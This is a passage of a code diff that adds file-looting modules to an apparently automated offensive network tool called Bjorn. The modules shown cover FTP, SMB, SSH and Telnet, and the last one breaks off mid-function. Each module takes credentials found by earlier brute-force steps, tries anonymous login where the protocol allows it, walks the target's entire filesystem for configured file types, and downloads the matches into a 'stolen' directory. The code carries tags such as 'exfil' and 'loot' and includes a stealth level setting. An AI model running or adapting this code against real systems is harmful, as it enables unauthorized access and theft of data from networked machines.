by_mac = self.shared_data.db.query(
|
||||
"""
|
||||
SELECT "user","password"
|
||||
FROM creds
|
||||
WHERE service='ftp'
|
||||
AND COALESCE(mac_address,'')=:mac
|
||||
AND (port IS NULL OR port=:port)
|
||||
""", params)
|
||||
|
||||
seen, out = set(), []
|
||||
for row in (by_ip + by_mac):
|
||||
u = str(row.get("user") or "").strip()
|
||||
p = str(row.get("password") or "").strip()
|
||||
if not u or (u, p) in seen:
|
||||
continue
|
||||
seen.add((u, p))
|
||||
out.append((u, p))
|
||||
return out
|
||||
|
||||
# -------- FTP helpers --------
|
||||
def connect_ftp(self, ip: str, username: str, password: str) -> Optional[FTP]:
|
||||
try:
|
||||
ftp = FTP()
|
||||
ftp.connect(ip, b_port, timeout=10)
|
||||
ftp.login(user=username, passwd=password)
|
||||
self.ftp_connected = True
|
||||
logger.info(f"Connected to {ip} via FTP as {username}")
|
||||
return ftp
|
||||
except Exception as e:
|
||||
logger.info(f"FTP connect failed {ip} {username}:{password}: {e}")
|
||||
return None
|
||||
|
||||
def find_files(self, ftp: FTP, dir_path: str) -> List[str]:
|
||||
files: List[str] = []
|
||||
try:
|
||||
if self.shared_data.orchestrator_should_exit or self.stop_execution:
|
||||
logger.info("File search interrupted.")
|
||||
return []
|
||||
ftp.cwd(dir_path)
|
||||
items = ftp.nlst()
|
||||
|
||||
for item in items:
|
||||
if self.shared_data.orchestrator_should_exit or self.stop_execution:
|
||||
logger.info("File search interrupted.")
|
||||
return []
|
||||
|
||||
try:
|
||||
ftp.cwd(item) # if ok -> directory
|
||||
files.extend(self.find_files(ftp, os.path.join(dir_path, item)))
|
||||
ftp.cwd('..')
|
||||
except Exception:
|
||||
# not a dir => file candidate
|
||||
if any(item.endswith(ext) for ext in (self.shared_data.steal_file_extensions or [])) or \
|
||||
any(name in item for name in (self.shared_data.steal_file_names or [])):
|
||||
files.append(os.path.join(dir_path, item))
|
||||
logger.info(f"Found {len(files)} matching files in {dir_path} on FTP")
|
||||
except Exception as e:
|
||||
logger.error(f"FTP path error {dir_path}: {e}")
|
||||
raise
|
||||
return files
|
||||
|
||||
def steal_file(self, ftp: FTP, remote_file: str, base_dir: str) -> None:
|
||||
try:
|
||||
local_file_path = os.path.join(base_dir, os.path.relpath(remote_file, '/'))
|
||||
os.makedirs(os.path.dirname(local_file_path), exist_ok=True)
|
||||
with open(local_file_path, 'wb') as f:
|
||||
ftp.retrbinary(f'RETR {remote_file}', f.write)
|
||||
logger.success(f"Downloaded {remote_file} -> {local_file_path}")
|
||||
except Exception as e:
|
||||
logger.error(f"FTP download error {remote_file}: {e}")
|
||||
|
||||
# -------- Orchestrator entry --------
|
||||
def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
|
||||
try:
|
||||
self.shared_data.bjorn_orch_status = b_class
|
||||
try:
|
||||
port_i = int(port)
|
||||
except Exception:
|
||||
port_i = b_port
|
||||
|
||||
creds = self._get_creds_for_target(ip, port_i)
|
||||
logger.info(f"Found {len(creds)} FTP credentials in DB for {ip}")
|
||||
|
||||
def try_anonymous() -> Optional[FTP]:
|
||||
return self.connect_ftp(ip, 'anonymous', '')
|
||||
|
||||
if not creds and not try_anonymous():
|
||||
logger.error(f"No FTP credentials for {ip}. Skipping.")
|
||||
return 'failed'
|
||||
|
||||
def _timeout():
|
||||
if not self.ftp_connected:
|
||||
logger.error(f"No FTP connection within 4 minutes for {ip}. Failing.")
|
||||
self.stop_execution = True
|
||||
|
||||
timer = Timer(240, _timeout)
|
||||
timer.start()
|
||||
|
||||
mac = (row or {}).get("MAC Address") or self.mac_for_ip(ip) or "UNKNOWN"
|
||||
success = False
|
||||
|
||||
# Anonymous first
|
||||
ftp = try_anonymous()
|
||||
if ftp:
|
||||
files = self.find_files(ftp, '/')
|
||||
local_dir = os.path.join(self.shared_data.data_stolen_dir, f"ftp/{mac}_{ip}/anonymous")
|
||||
if files:
|
||||
for remote in files:
|
||||
if self.stop_execution or self.shared_data.orchestrator_should_exit:
|
||||
logger.info("Execution interrupted.")
|
||||
break
|
||||
self.steal_file(ftp, remote, local_dir)
|
||||
logger.success(f"Stole {len(files)} files from {ip} via anonymous")
|
||||
success = True
|
||||
try:
|
||||
ftp.quit()
|
||||
except Exception:
|
||||
pass
|
||||
if success:
|
||||
timer.cancel()
|
||||
return 'success'
|
||||
|
||||
# Authenticated creds
|
||||
for username, password in creds:
|
||||
if self.stop_execution or self.shared_data.orchestrator_should_exit:
|
||||
logger.info("Execution interrupted.")
|
||||
break
|
||||
try:
|
||||
logger.info(f"Trying FTP {username}:{password} @ {ip}")
|
||||
ftp = self.connect_ftp(ip, username, password)
|
||||
if not ftp:
|
||||
continue
|
||||
files = self.find_files(ftp, '/')
|
||||
local_dir = os.path.join(self.shared_data.data_stolen_dir, f"ftp/{mac}_{ip}/{username}")
|
||||
if files:
|
||||
for remote in files:
|
||||
if self.stop_execution or self.shared_data.orchestrator_should_exit:
|
||||
logger.info("Execution interrupted.")
|
||||
break
|
||||
self.steal_file(ftp, remote, local_dir)
|
||||
logger.info(f"Stole {len(files)} files from {ip} as {username}")
|
||||
success = True
|
||||
try:
|
||||
ftp.quit()
|
||||
except Exception:
|
||||
pass
|
||||
if success:
|
||||
timer.cancel()
|
||||
return 'success'
|
||||
except Exception as e:
|
||||
logger.error(f"FTP loot error {ip} {username}: {e}")
|
||||
|
||||
timer.cancel()
|
||||
return 'success' if success else 'failed'
|
||||
|
||||
except Exception as e:
|
||||
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
|
||||
return 'failed'
|
||||
252
resources/default_config/actions/steal_files_smb.py
Normal file
@@ -0,0 +1,252 @@
|
||||
"""
|
||||
steal_files_smb.py — SMB file looter (DB-backed).
|
||||
|
||||
SQL mode:
|
||||
- Orchestrator provides (ip, port) after parent success (SMBBruteforce).
|
||||
- DB.creds (service='smb') provides credentials; 'database' column stores share name.
|
||||
- Also try anonymous (''/'').
|
||||
- Output under: {data_stolen_dir}/smb/{mac}_{ip}/{share}/...
|
||||
"""
|
||||
|
||||
import os
|
||||
import logging
|
||||
import time
|
||||
from threading import Timer
|
||||
from typing import List, Tuple, Dict, Optional
|
||||
|
||||
from smb.SMBConnection import SMBConnection
|
||||
from shared import SharedData
|
||||
from logger import Logger
|
||||
|
||||
logger = Logger(name="steal_files_smb.py", level=logging.DEBUG)
|
||||
|
||||
b_class = "StealFilesSMB"
|
||||
b_module = "steal_files_smb"
|
||||
b_status = "steal_files_smb"
|
||||
b_parent = "SMBBruteforce"
|
||||
b_port = 445
|
||||
|
||||
|
||||
class StealFilesSMB:
|
||||
def __init__(self, shared_data: SharedData):
|
||||
self.shared_data = shared_data
|
||||
self.smb_connected = False
|
||||
self.stop_execution = False
|
||||
self.IGNORED_SHARES = set(self.shared_data.ignored_smb_shares or [])
|
||||
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
|
||||
self._refresh_ip_identity_cache()
|
||||
logger.info("StealFilesSMB initialized")
|
||||
|
||||
# -------- Identity cache --------
|
||||
def _refresh_ip_identity_cache(self) -> None:
|
||||
self._ip_to_identity.clear()
|
||||
try:
|
||||
rows = self.shared_data.db.get_all_hosts()
|
||||
except Exception as e:
|
||||
logger.error(f"DB get_all_hosts failed: {e}")
|
||||
rows = []
|
||||
for r in rows:
|
||||
mac = r.get("mac_address") or ""
|
||||
if not mac:
|
||||
continue
|
||||
hostnames_txt = r.get("hostnames") or ""
|
||||
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
|
||||
ips_txt = r.get("ips") or ""
|
||||
if not ips_txt:
|
||||
continue
|
||||
for ip in [p.strip() for p in ips_txt.split(';') if p.strip()]:
|
||||
self._ip_to_identity[ip] = (mac, current_hn)
|
||||
|
||||
def mac_for_ip(self, ip: str) -> Optional[str]:
|
||||
if ip not in self._ip_to_identity:
|
||||
self._refresh_ip_identity_cache()
|
||||
return self._ip_to_identity.get(ip, (None, None))[0]
|
||||
|
||||
def hostname_for_ip(self, ip: str) -> Optional[str]:
|
||||
if ip not in self._ip_to_identity:
|
||||
self._refresh_ip_identity_cache()
|
||||
return self._ip_to_identity.get(ip, (None, None))[1]
|
||||
|
||||
# -------- Creds (grouped by share) --------
|
||||
def _get_creds_by_share(self, ip: str, port: int) -> Dict[str, List[Tuple[str, str]]]:
|
||||
"""
|
||||
Returns {share: [(user,pass), ...]} from DB.creds (service='smb', database=share).
|
||||
Prefer IP; also include MAC if known. Dedup per share.
|
||||
"""
|
||||
mac = self.mac_for_ip(ip)
|
||||
params = {"ip": ip, "port": port, "mac": mac or ""}
|
||||
|
||||
by_ip = self.shared_data.db.query(
|
||||
"""
|
||||
SELECT "user","password","database"
|
||||
FROM creds
|
||||
WHERE service='smb'
|
||||
AND COALESCE(ip,'')=:ip
|
||||
AND (port IS NULL OR port=:port)
|
||||
""", params)
|
||||
|
||||
by_mac = []
|
||||
if mac:
|
||||
by_mac = self.shared_data.db.query(
|
||||
"""
|
||||
SELECT "user","password","database"
|
||||
FROM creds
|
||||
WHERE service='smb'
|
||||
AND COALESCE(mac_address,'')=:mac
|
||||
AND (port IS NULL OR port=:port)
|
||||
""", params)
|
||||
|
||||
out: Dict[str, List[Tuple[str, str]]] = {}
|
||||
seen: Dict[str, set] = {}
|
||||
for row in (by_ip + by_mac):
|
||||
share = str(row.get("database") or "").strip()
|
||||
user = str(row.get("user") or "").strip()
|
||||
pwd = str(row.get("password") or "").strip()
|
||||
if not user or not share:
|
||||
continue
|
||||
if share not in out:
|
||||
out[share], seen[share] = [], set()
|
||||
if (user, pwd) in seen[share]:
|
||||
continue
|
||||
seen[share].add((user, pwd))
|
||||
out[share].append((user, pwd))
|
||||
return out
|
||||
|
||||
# -------- SMB helpers --------
|
||||
def connect_smb(self, ip: str, username: str, password: str) -> Optional[SMBConnection]:
|
||||
try:
|
||||
conn = SMBConnection(username, password, "Bjorn", "Target", use_ntlm_v2=True, is_direct_tcp=True)
|
||||
conn.connect(ip, b_port)
|
||||
self.smb_connected = True
|
||||
logger.info(f"Connected SMB {ip} as {username}")
|
||||
return conn
|
||||
except Exception as e:
|
||||
logger.error(f"SMB connect error {ip} {username}: {e}")
|
||||
return None
|
||||
|
||||
def list_shares(self, conn: SMBConnection):
|
||||
try:
|
||||
shares = conn.listShares()
|
||||
return [s for s in shares if (s.name not in self.IGNORED_SHARES and not s.isSpecial and not s.isTemporary)]
|
||||
except Exception as e:
|
||||
logger.error(f"list_shares error: {e}")
|
||||
return []
|
||||
|
||||
def find_files(self, conn: SMBConnection, share: str, dir_path: str) -> List[str]:
|
||||
files: List[str] = []
|
||||
try:
|
||||
for entry in conn.listPath(share, dir_path):
|
||||
if self.shared_data.orchestrator_should_exit or self.stop_execution:
|
||||
logger.info("File search interrupted.")
|
||||
return []
|
||||
if entry.isDirectory:
|
||||
if entry.filename not in ('.', '..'):
|
||||
files.extend(self.find_files(conn, share, os.path.join(dir_path, entry.filename)))
|
||||
else:
|
||||
name = entry.filename
|
||||
if any(name.endswith(ext) for ext in (self.shared_data.steal_file_extensions or [])) or \
|
||||
any(sn in name for sn in (self.shared_data.steal_file_names or [])):
|
||||
files.append(os.path.join(dir_path, name))
|
||||
return files
|
||||
except Exception as e:
|
||||
logger.error(f"SMB path error {share}:{dir_path}: {e}")
|
||||
raise
|
||||
|
||||
def steal_file(self, conn: SMBConnection, share: str, remote_file: str, base_dir: str) -> None:
|
||||
try:
|
||||
local_file_path = os.path.join(base_dir, os.path.relpath(remote_file, '/'))
|
||||
os.makedirs(os.path.dirname(local_file_path), exist_ok=True)
|
||||
with open(local_file_path, 'wb') as f:
|
||||
conn.retrieveFile(share, remote_file, f)
|
||||
logger.success(f"Downloaded {share}:{remote_file} -> {local_file_path}")
|
||||
except Exception as e:
|
||||
logger.error(f"SMB download error {share}:{remote_file}: {e}")
|
||||
|
||||
# -------- Orchestrator entry --------
|
||||
def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
|
||||
try:
|
||||
self.shared_data.bjorn_orch_status = b_class
|
||||
try:
|
||||
port_i = int(port)
|
||||
except Exception:
|
||||
port_i = b_port
|
||||
|
||||
creds_by_share = self._get_creds_by_share(ip, port_i)
|
||||
logger.info(f"Found SMB creds for {len(creds_by_share)} share(s) in DB for {ip}")
|
||||
|
||||
def _timeout():
|
||||
if not self.smb_connected:
|
||||
logger.error(f"No SMB connection within 4 minutes for {ip}. Failing.")
|
||||
self.stop_execution = True
|
||||
|
||||
timer = Timer(240, _timeout)
|
||||
timer.start()
|
||||
|
||||
mac = (row or {}).get("MAC Address") or self.mac_for_ip(ip) or "UNKNOWN"
|
||||
success = False
|
||||
|
||||
# Anonymous first (''/'')
|
||||
try:
|
||||
conn = self.connect_smb(ip, '', '')
|
||||
if conn:
|
||||
shares = self.list_shares(conn)
|
||||
for s in shares:
|
||||
files = self.find_files(conn, s.name, '/')
|
||||
if files:
|
||||
base = os.path.join(self.shared_data.data_stolen_dir, f"smb/{mac}_{ip}/{s.name}")
|
||||
for remote in files:
|
||||
if self.stop_execution or self.shared_data.orchestrator_should_exit:
|
||||
logger.info("Execution interrupted.")
|
||||
break
|
||||
self.steal_file(conn, s.name, remote, base)
|
||||
logger.success(f"Stole {len(files)} files from {ip} via anonymous on {s.name}")
|
||||
success = True
|
||||
try:
|
||||
conn.close()
|
||||
except Exception:
|
||||
pass
|
||||
except Exception as e:
|
||||
logger.info(f"Anonymous SMB failed on {ip}: {e}")
|
||||
|
||||
if success:
|
||||
timer.cancel()
|
||||
return 'success'
|
||||
|
||||
# Per-share credentials
|
||||
for share, creds in creds_by_share.items():
|
||||
if share in self.IGNORED_SHARES:
|
||||
continue
|
||||
for username, password in creds:
|
||||
if self.stop_execution or self.shared_data.orchestrator_should_exit:
|
||||
logger.info("Execution interrupted.")
|
||||
break
|
||||
try:
|
||||
conn = self.connect_smb(ip, username, password)
|
||||
if not conn:
|
||||
continue
|
||||
files = self.find_files(conn, share, '/')
|
||||
if files:
|
||||
base = os.path.join(self.shared_data.data_stolen_dir, f"smb/{mac}_{ip}/{share}")
|
||||
for remote in files:
|
||||
if self.stop_execution or self.shared_data.orchestrator_should_exit:
|
||||
logger.info("Execution interrupted.")
|
||||
break
|
||||
self.steal_file(conn, share, remote, base)
|
||||
logger.info(f"Stole {len(files)} files from {ip} share={share} as {username}")
|
||||
success = True
|
||||
try:
|
||||
conn.close()
|
||||
except Exception:
|
||||
pass
|
||||
if success:
|
||||
timer.cancel()
|
||||
return 'success'
|
||||
except Exception as e:
|
||||
logger.error(f"SMB loot error {ip} {share} {username}: {e}")
|
||||
|
||||
timer.cancel()
|
||||
return 'success' if success else 'failed'
|
||||
|
||||
except Exception as e:
|
||||
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
|
||||
return 'failed'
|
||||
330
resources/default_config/actions/steal_files_ssh.py
Normal file
@@ -0,0 +1,330 @@
|
||||
"""
|
||||
steal_files_ssh.py — SSH file looter (DB-backed)
|
||||
|
||||
SQL mode:
|
||||
- Orchestrator provides (ip, port) and ensures parent action success (SSHBruteforce).
|
||||
- SSH credentials are read from the DB table `creds` (service='ssh').
|
||||
- IP -> (MAC, hostname) mapping is read from the DB table `hosts`.
|
||||
- Looted files are saved under: {shared_data.data_stolen_dir}/ssh/{mac}_{ip}/...
|
||||
- Paramiko logs are silenced to avoid noisy banners/tracebacks.
|
||||
|
||||
Parent gate:
|
||||
- Orchestrator enforces parent success (b_parent='SSHBruteforce').
|
||||
- This action runs once per eligible target (alive, open port, parent OK).
|
||||
"""
|
||||
|
||||
import os
|
||||
import time
|
||||
import logging
|
||||
import paramiko
|
||||
from threading import Timer
|
||||
from typing import List, Tuple, Dict, Optional
|
||||
|
||||
from shared import SharedData
|
||||
from logger import Logger
|
||||
|
||||
# Logger for this module
|
||||
logger = Logger(name="steal_files_ssh.py", level=logging.DEBUG)
|
||||
|
||||
# Silence Paramiko's internal logs (no "Error reading SSH protocol banner" spam)
|
||||
for _name in ("paramiko", "paramiko.transport", "paramiko.client", "paramiko.hostkeys"):
|
||||
logging.getLogger(_name).setLevel(logging.CRITICAL)
|
||||
|
||||
b_class = "StealFilesSSH" # Unique action identifier
|
||||
b_module = "steal_files_ssh" # Python module name (this file without .py)
|
||||
b_status = "steal_files_ssh" # Human/readable status key (free form)
|
||||
|
||||
b_action = "normal" # 'normal' (per-host) or 'global'
|
||||
b_service = ["ssh"] # Services this action is about (JSON-ified by sync_actions)
|
||||
b_port = 22 # Preferred target port (used if present on host)
|
||||
|
||||
# Trigger strategy:
|
||||
# - Prefer to run as soon as SSH credentials exist for this MAC (on_cred_found:ssh).
|
||||
# - Also allow starting when the host exposes SSH (on_service:ssh),
|
||||
# but the requirements below still enforce that SSH creds must be present.
|
||||
b_trigger = 'on_any:["on_cred_found:ssh","on_service:ssh"]'
|
||||
|
||||
# Requirements (JSON string):
|
||||
# - must have SSH credentials on this MAC
|
||||
# - must have port 22 (legacy fallback if port_services is missing)
|
||||
# - limit concurrent running actions system-wide to 2 for safety
|
||||
b_requires = '{"all":[{"has_cred":"ssh"},{"has_port":22},{"max_concurrent":2}]}'
|
||||
|
||||
# Scheduling / limits
|
||||
b_priority = 70 # 0..100 (higher processed first in this schema)
|
||||
b_timeout = 900 # seconds before a pending queue item expires
|
||||
b_max_retries = 1 # minimal retries; avoid noisy re-runs
|
||||
b_cooldown = 86400 # seconds (per-host cooldown between runs)
|
||||
b_rate_limit = "3/86400" # at most 3 executions/day per host (extra guard)
|
||||
|
||||
# Risk / hygiene
|
||||
b_stealth_level = 6 # 1..10 (higher = more stealthy)
|
||||
b_risk_level = "high" # 'low' | 'medium' | 'high'
|
||||
b_enabled = 1 # set to 0 to disable from DB sync
|
||||
|
||||
# Tags (free taxonomy, JSON-ified by sync_actions)
|
||||
b_tags = ["exfil", "ssh", "loot"]
|
||||
|
||||
class StealFilesSSH:
|
||||
"""StealFilesSSH: connects via SSH using known creds and downloads matching files."""
|
||||
|
||||
def __init__(self, shared_data: SharedData):
|
||||
"""Init: store shared_data, flags, and build an IP->(MAC, hostname) cache."""
|
||||
self.shared_data = shared_data
|
||||
self.sftp_connected = False # flipped to True on first SFTP open
|
||||
self.stop_execution = False # global kill switch (timer / orchestrator exit)
|
||||
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
|
||||
self._refresh_ip_identity_cache()
|
||||
logger.info("StealFilesSSH initialized")
|
||||
|
||||
# --------------------- Identity cache (hosts) ---------------------
|
||||
|
||||
def _refresh_ip_identity_cache(self) -> None:
|
||||
"""Rebuild IP -> (MAC, current_hostname) from DB.hosts."""
|
||||
self._ip_to_identity.clear()
|
||||
try:
|
||||
rows = self.shared_data.db.get_all_hosts()
|
||||
except Exception as e:
|
||||
logger.error(f"DB get_all_hosts failed: {e}")
|
||||
rows = []
|
||||
|
||||
for r in rows:
|
||||
mac = r.get("mac_address") or ""
|
||||
if not mac:
|
||||
continue
|
||||
hostnames_txt = r.get("hostnames") or ""
|
||||
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
|
||||
ips_txt = r.get("ips") or ""
|
||||
if not ips_txt:
|
||||
continue
|
||||
for ip in [p.strip() for p in ips_txt.split(';') if p.strip()]:
|
||||
self._ip_to_identity[ip] = (mac, current_hn)
|
||||
|
||||
def mac_for_ip(self, ip: str) -> Optional[str]:
|
||||
"""Return MAC for IP using the local cache (refresh on miss)."""
|
||||
if ip not in self._ip_to_identity:
|
||||
self._refresh_ip_identity_cache()
|
||||
return self._ip_to_identity.get(ip, (None, None))[0]
|
||||
|
||||
def hostname_for_ip(self, ip: str) -> Optional[str]:
|
||||
"""Return current hostname for IP using the local cache (refresh on miss)."""
|
||||
if ip not in self._ip_to_identity:
|
||||
self._refresh_ip_identity_cache()
|
||||
return self._ip_to_identity.get(ip, (None, None))[1]
|
||||
|
||||
# --------------------- Credentials (creds table) ---------------------
|
||||
|
||||
def _get_creds_for_target(self, ip: str, port: int) -> List[Tuple[str, str]]:
|
||||
"""
|
||||
Fetch SSH creds for this target from DB.creds.
|
||||
Strategy:
|
||||
- Prefer rows where service='ssh' AND ip=target_ip AND (port is NULL or matches).
|
||||
- Also include rows for same MAC (if known), still service='ssh'.
|
||||
Returns list of (username, password), deduplicated.
|
||||
"""
|
||||
mac = self.mac_for_ip(ip)
|
||||
params = {"ip": ip, "port": port, "mac": mac or ""}
|
||||
|
||||
# Pull by IP
|
||||
by_ip = self.shared_data.db.query(
|
||||
"""
|
||||
SELECT "user", "password"
|
||||
FROM creds
|
||||
WHERE service='ssh'
|
||||
AND COALESCE(ip,'') = :ip
|
||||
AND (port IS NULL OR port = :port)
|
||||
""",
|
||||
params
|
||||
)
|
||||
|
||||
# Pull by MAC (if we have one)
|
||||
by_mac = []
|
||||
if mac:
|
||||
by_mac = self.shared_data.db.query(
|
||||
"""
|
||||
SELECT "user", "password"
|
||||
FROM creds
|
||||
WHERE service='ssh'
|
||||
AND COALESCE(mac_address,'') = :mac
|
||||
AND (port IS NULL OR port = :port)
|
||||
""",
|
||||
params
|
||||
)
|
||||
|
||||
# Deduplicate while preserving order
|
||||
seen = set()
|
||||
out: List[Tuple[str, str]] = []
|
||||
for row in (by_ip + by_mac):
|
||||
u = str(row.get("user") or "").strip()
|
||||
p = str(row.get("password") or "").strip()
|
||||
if not u or (u, p) in seen:
|
||||
continue
|
||||
seen.add((u, p))
|
||||
out.append((u, p))
|
||||
return out
|
||||
|
||||
# --------------------- SSH helpers ---------------------
|
||||
|
||||
def connect_ssh(self, ip: str, username: str, password: str, port: int = b_port, timeout: int = 10):
|
||||
"""
|
||||
Open an SSH connection (no agent, no keys). Returns an active SSHClient or raises.
|
||||
NOTE: Paramiko logs are silenced at module import level.
|
||||
"""
|
||||
ssh = paramiko.SSHClient()
|
||||
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
|
||||
# Be explicit: no interactive agents/keys; bounded timeouts to avoid hangs
|
||||
ssh.connect(
|
||||
hostname=ip,
|
||||
username=username,
|
||||
password=password,
|
||||
port=port,
|
||||
timeout=timeout,
|
||||
auth_timeout=timeout,
|
||||
banner_timeout=timeout,
|
||||
allow_agent=False,
|
||||
look_for_keys=False,
|
||||
)
|
||||
logger.info(f"Connected to {ip} via SSH as {username}")
|
||||
return ssh
|
||||
|
||||
def find_files(self, ssh: paramiko.SSHClient, dir_path: str) -> List[str]:
|
||||
"""
|
||||
List candidate files from remote dir, filtered by config:
|
||||
- shared_data.steal_file_extensions (endswith)
|
||||
- shared_data.steal_file_names (substring match)
|
||||
Uses `find <dir> -type f 2>/dev/null` to keep it quiet.
|
||||
"""
|
||||
# Quiet 'permission denied' messages via redirection
|
||||
cmd = f'find {dir_path} -type f 2>/dev/null'
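        # dir_path is a trusted constant ('/') in this action; if it ever became
        # user-controlled it should be quoted first (e.g. shlex.quote).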
|
||||
stdin, stdout, stderr = ssh.exec_command(cmd)
|
||||
files = (stdout.read().decode(errors="ignore") or "").splitlines()
|
||||
|
||||
exts = set(self.shared_data.steal_file_extensions or [])
|
||||
names = set(self.shared_data.steal_file_names or [])
|
||||
if not exts and not names:
|
||||
# If no filters are defined, do nothing (too risky to pull everything).
|
||||
logger.warning("No steal_file_extensions / steal_file_names configured — skipping.")
|
||||
return []
|
||||
|
||||
matches: List[str] = []
|
||||
for fpath in files:
|
||||
if self.shared_data.orchestrator_should_exit or self.stop_execution:
|
||||
logger.info("File search interrupted.")
|
||||
return []
|
||||
fname = os.path.basename(fpath)
|
||||
if (exts and any(fname.endswith(ext) for ext in exts)) or (names and any(sn in fname for sn in names)):
|
||||
matches.append(fpath)
|
||||
|
||||
logger.info(f"Found {len(matches)} matching files in {dir_path}")
|
||||
return matches
|
||||
|
||||
def steal_file(self, ssh: paramiko.SSHClient, remote_file: str, local_dir: str) -> None:
|
||||
"""
|
||||
Download a single remote file into the given local dir, preserving subdirs.
|
||||
"""
|
||||
sftp = ssh.open_sftp()
|
||||
self.sftp_connected = True # first time we open SFTP, mark as connected
|
||||
|
||||
# Preserve partial directory structure under local_dir
|
||||
remote_dir = os.path.dirname(remote_file)
|
||||
local_file_dir = os.path.join(local_dir, os.path.relpath(remote_dir, '/'))
|
||||
os.makedirs(local_file_dir, exist_ok=True)
|
||||
|
||||
local_file_path = os.path.join(local_file_dir, os.path.basename(remote_file))
|
||||
sftp.get(remote_file, local_file_path)
|
||||
sftp.close()
|
||||
|
||||
logger.success(f"Downloaded: {remote_file} -> {local_file_path}")
|
||||
|
||||
# --------------------- Orchestrator entrypoint ---------------------
|
||||
|
||||
def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
|
||||
"""
|
||||
Orchestrator entrypoint (signature preserved):
|
||||
- ip: target IP
|
||||
- port: str (expected '22')
|
||||
- row: current target row (compat structure built by shared_data)
|
||||
- status_key: action name (b_class)
|
||||
Returns 'success' if at least one file stolen; else 'failed'.
|
||||
"""
|
||||
try:
|
||||
self.shared_data.bjorn_orch_status = b_class
|
||||
|
||||
# Gather credentials from DB
|
||||
try:
|
||||
port_i = int(port)
|
||||
except Exception:
|
||||
port_i = b_port
|
||||
|
||||
creds = self._get_creds_for_target(ip, port_i)
|
||||
logger.info(f"Found {len(creds)} SSH credentials in DB for {ip}")
|
||||
if not creds:
|
||||
logger.error(f"No SSH credentials for {ip}. Skipping.")
|
||||
return 'failed'
|
||||
|
||||
# Define a timer: if we never establish SFTP in 4 minutes, abort
|
||||
def _timeout():
|
||||
if not self.sftp_connected:
|
||||
logger.error(f"No SFTP connection established within 4 minutes for {ip}. Marking as failed.")
|
||||
self.stop_execution = True
|
||||
|
||||
timer = Timer(240, _timeout)
|
||||
timer.start()
|
||||
|
||||
# Identify where to save loot
|
||||
mac = (row or {}).get("MAC Address") or self.mac_for_ip(ip) or "UNKNOWN"
|
||||
base_dir = os.path.join(self.shared_data.data_stolen_dir, f"ssh/{mac}_{ip}")
|
||||
|
||||
# Try each credential until success (or interrupted)
|
||||
success_any = False
|
||||
for username, password in creds:
|
||||
if self.stop_execution or self.shared_data.orchestrator_should_exit:
|
||||
logger.info("Execution interrupted.")
|
||||
break
|
||||
|
||||
try:
|
||||
logger.info(f"Trying credential {username}:{password} for {ip}")
|
||||
ssh = self.connect_ssh(ip, username, password, port=port_i)
|
||||
# Search from root; filtered by config
|
||||
files = self.find_files(ssh, '/')
|
||||
|
||||
if files:
|
||||
for remote in files:
|
||||
if self.stop_execution or self.shared_data.orchestrator_should_exit:
|
||||
logger.info("Execution interrupted during download.")
|
||||
break
|
||||
self.steal_file(ssh, remote, base_dir)
|
||||
|
||||
logger.success(f"Successfully stole {len(files)} files from {ip}:{port_i} as {username}")
|
||||
success_any = True
|
||||
|
||||
try:
|
||||
ssh.close()
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
if success_any:
|
||||
break # one successful cred is enough
|
||||
|
||||
except Exception as e:
|
||||
# Stay quiet on Paramiko internals; just log the reason and try next cred
|
||||
logger.error(f"SSH loot attempt failed on {ip} with {username}: {e}")
|
||||
|
||||
timer.cancel()
|
||||
return 'success' if success_any else 'failed'
|
||||
|
||||
except Exception as e:
|
||||
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
|
||||
return 'failed'
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
# Minimal smoke test if run standalone (not used in production; orchestrator calls execute()).
|
||||
try:
|
||||
sd = SharedData()
|
||||
action = StealFilesSSH(sd)
|
||||
# Example (replace with a real IP that has creds in DB):
|
||||
# result = action.execute("192.168.1.10", "22", {"MAC Address": "AA:BB:CC:DD:EE:FF"}, b_status)
|
||||
# print("Result:", result)
|
||||
except Exception as e:
|
||||
logger.error(f"Error in main execution: {e}")
|
||||
218
resources/default_config/actions/steal_files_telnet.py
Normal file
@@ -0,0 +1,218 @@
|
||||
"""
|
||||
steal_files_telnet.py — Telnet file looter (DB-backed)
|
||||
|
||||
DB mode:
|
||||
- Orchestrator provides (ip, port) after parent success (TelnetBruteforce).
|
||||
- Credentials read from DB.creds (service='telnet'); we try each pair.
|
||||
- Files found via 'find / -type f', then retrieved with 'cat'.
|
||||
- Output under: {data_stolen_dir}/telnet/{mac}_{ip}/...
|
||||
"""
|
||||
|
||||
import os
|
||||
import telnetlib
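# NOTE: telnetlib is deprecated since Python 3.11 and removed in 3.13 (PEP 594);
# running on a newer interpreter would require a vendored copy or a backport.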
|
||||
import logging
|
||||
import time
|
||||
from threading import Timer
|
||||
from typing import List, Tuple, Dict, Optional
|
||||
|
||||
from shared import SharedData
|
||||
from logger import Logger
|
||||
|
||||
logger = Logger(name="steal_files_telnet.py", level=logging.DEBUG)
|
||||
|
||||
b_class = "StealFilesTelnet"
|
||||
b_module = "steal_files_telnet"
|
||||
b_status = "steal_files_telnet"
|
||||
b_parent = "TelnetBruteforce"
|
||||
b_port = 23
|
||||
|
||||
|
||||
class StealFilesTelnet:
|
||||
def __init__(self, shared_data: SharedData):
|
||||
self.shared_data = shared_data
|
||||
self.telnet_connected = False
|
||||
self.stop_execution = False
|
||||
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
|
||||
self._refresh_ip_identity_cache()
|
||||
logger.info("StealFilesTelnet initialized")
|
||||
|
||||
# -------- Identity cache --------
|
||||
def _refresh_ip_identity_cache(self) -> None:
|
||||
self._ip_to_identity.clear()
|
||||
try:
|
||||
rows = self.shared_data.db.get_all_hosts()
|
||||
except Exception as e:
|
||||
logger.error(f"DB get_all_hosts failed: {e}")
|
||||
rows = []
|
||||
for r in rows:
|
||||
mac = r.get("mac_address") or ""
|
||||
if not mac:
|
||||
continue
|
||||
hostnames_txt = r.get("hostnames") or ""
|
||||
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
